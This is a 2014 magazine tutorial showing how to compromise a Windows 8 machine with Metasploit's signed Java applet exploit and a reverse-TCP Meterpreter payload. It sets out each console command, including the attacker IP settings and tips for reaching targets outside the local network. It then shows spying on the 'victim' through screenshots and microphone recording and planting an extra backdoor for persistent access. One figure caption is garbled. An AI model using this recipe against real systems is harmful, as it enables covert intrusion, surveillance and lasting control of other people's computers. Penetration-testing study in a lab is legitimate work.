Hackers about hacking techniques in our IT Security Magazine

How To Exploit Windows 8 With Metasploit

How To Exploit Windows 8 With Metasploit

microsoft-237843_640

In this article we’re going to learn how to exploit (Windows 8 Preview Build 8400) with client-side attack technique, we’ll get meterpreter session on windows 8 machine. For those who don’t know what is metasploit project.

The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shell-code archive, and security research. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. (Wikipedia)

In this article we’re going to work with Metsaploit the console presented in the first graph.

 win1

Figure 1. Metasploit Console

How to prepare your labs ?

First You need Backtrack 5 with metasploit or you can download metasploit project for your system from link below: http://www.rapid7.com/products/metasploit/download.jsp. Secondly, you need “windows 8 preview Build 8400”

 win2

Figure 2. MSFGUI

Now ready For exploiting ??

1 – first, open the terminal and type “msfconsole“

Note

I typed – sudo su – to take root privilage first because I’m not working on backtrack if you’re on backtack just type msfconsole in terminal as shown in Figure 3

win3

Figure 3. Msf console terminal

Wait for a while and it will be opened, you’ll see a command line starts with MSF> – as shown in the Figure 4.

win4

Figure 4. Msf command line

2 – Secondly, I’ll use an exploit called “Java_signed_applet” which targets JAVA vulnerable versions and can affect a huge amount of computers.

We’ll type in Msf > search java signed, as shown in Figure 5.

win5

Figure 5. Search for java signed applet

We’ll use the first one exploit/multi/browser/java_signed_applet to use any exploit in metasploit project type “use” before exploit name. As shown in Figure 6.

win6

Figure 6. Use exploit

Hint

To get more info about the exploit you can type “info” and you’ll get more information about this exploit – as shown in Figure 7. Here’s the exploit’s description and I think that now we understand how this exploit works (Listing 1). We need to know what’s option for this exploit so we’ll type in “show options” it’s included also in info, as shown in Figure 8.

win7

Figure 7. Exploit information

Listing 1. Exploit Description

Description:

This exploit dynamically creates a .jar file via the

Msf::Exploit::Java mixin,then signs the it. The resulting signed

applet is presented to the victim via a web page with an applet tag.

The victim’s JVM will pop a dialog asking if they trust the signed

applet. On older versions the dialog will display the value of

CERTCN in the “Publisher” line. Newer JVMs display “UNKNOWN” when

the signature is not trusted (i.e., it’s not signed by a trusted

CA). The SigningCert option allows you to provide a trusted code

signing cert, the values in which will override CERTCN. If

SigningCert is not given, a randomly generated selfsigned cert will

be used. Either way, once the user clicks “run”, the applet executes

with full user permissions.

win8

Figure 8. Show options

3 – Next, we’ll set the SRVHOST which will be the attacker IP. We’ll type “ifconfig” in terminal to get internal IP address, as shown in Figure 9 – it’s 192.168.1.110.

win9

Figure 9. ifconfig

We’ll type in “set SRVHOST 192.168.1.110”

We’ll set the target which is (1 – Windows x86) because we’re going to attack windows machine so type in “set target 1”

We’ll set the LHOST which is Attacker IP and, because it’s inside an Internal network, we’ll set it with our local IP (192.168.1.110).

win10

Figure 10. set SRVHOST

win11

Figure 11. Set target

win12

Figure 12. Set LHOST

Note

If you’d like to attack outside your local network, you need to set your public IP address in LHOST, and enable DMZ on attacker machine or enable port forwarding.

Now you need to know which payload you’ll use after attacking machine and the most familiar one is meterpreter, so we’ll set the payload (windows/meterpreter/reverse_tcp), as shown in Figure 13.

win13

Figure 13. Set Payload

Note

If you’d like to use another payload you can type in “show payloads” and choose your preferred payload.

We’ll specify the URI which will be sent to victim machine. I want to make it on the main directory so I’ll type in “set URIPATH /“ as shown in Figure 14.

win14

Figure 14. Set URIPATH

Note

If you need to specify another URI name you can do it easily by typing in “set URIPATH name” and you can change “name” to your preferred word.

We’ll type in “exploit” to run it, and it will give us the URI which is our IP address with your preferred URIPATH – Figure 15.

win15

Figure 15. Exploit

Now, We need to send the URL to a victim machine so we’ll open it with our windows8 machine.

Finally, a message will appear on victim machine after opening URL. If he/she clicked on Run, a meterpreter sessions will be opened in attacker PC, as shown in Figure 16.

win16

Figure 16. Meterpreter

We Can do some commands with victim PC such as capturing screen or recording mic.

First, here’s the first command “sysinfo” – which tell you some information about the system (Figure 17).

win17

Figure 17. System information

We can also see what the processes run at the time in victim machine with “ps” command (Figure 18).

win18

Figure 18. Processes19).

win19

Figure 19. Mic record

And, if you need to take a screen-shot of victim’s screen you can do it easily by “screenshot” command (Figure 20).

win20

Figure 20. Screen-shot

Finally, I tried to upload payload and execute it in victim machine, so, if you want to keep the victim longer with you then you should upload another backdoor to keep in touch with them (Figure 21).

win21

Figure 21. Upload executable file

If you need any help with meterpreter just type “help” and all commands will come up and show in your screen (Figure 22).

win22

Figure 22. Help

References

http://en.wikipedia.org/wiki/Metasploit_project

http://www.metasploit.com/modules/exploit/multi/browser/java_signed_applet

http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf

Ahmed Sherif El-demrdash

Information security researcher | PHP Developer | Google Ambassador | Egyptian Malware analyst

Passionate of anything related to information security. For any help don’t hesitate to contact me

E-mail: ahmadsherif24@gmail.com

Twitter: @_ahmadsherif

Facebook: fb.com/ahmadsheri

 

May 14, 2014

0 Responses on How To Exploit Windows 8 With Metasploit"